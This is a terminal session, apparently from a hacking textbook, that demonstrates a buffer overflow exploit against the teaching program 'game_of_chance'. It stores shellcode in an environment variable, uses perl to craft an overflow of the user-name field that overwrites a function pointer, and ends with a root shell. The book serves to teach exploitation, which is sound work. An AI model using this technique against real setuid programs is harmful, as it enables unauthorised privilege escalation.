reader@hacking:~/booksrc $ export SHELLCODE=$(cat ./shellcode.bin) reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./game_of_chance SHELLCODE will be at 0xbffff9e0 reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n5\n" . "A"x100 . "\xe0\ xf9\xff\xbf\n" . "1\n"' > exploit_buffer reader@hacking:~/booksrc $ cat exploit_buffer - | ./game_of_chance -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 70 credits] -> [DEBUG] current_game pointer @ 0x08048fde ####### Pick a Number ###### This game costs 10 credits to play. Simply pick a number between 1 and 20, and if you pick the winning number, you will win the jackpot of 100 credits! 10 credits have been deducted from your account. Pick a number between 1 and 20: The winning number is 2 Sorry, you didn't win. You now have 60 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 60 credits] -> Change user name Enter your new name: Your name has been changed. -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 60 credits] -> [DEBUG] current_game pointer @ 0xbffff9e0 whoami root id uid=0(root) gid=999(reader) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46( plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(re ader)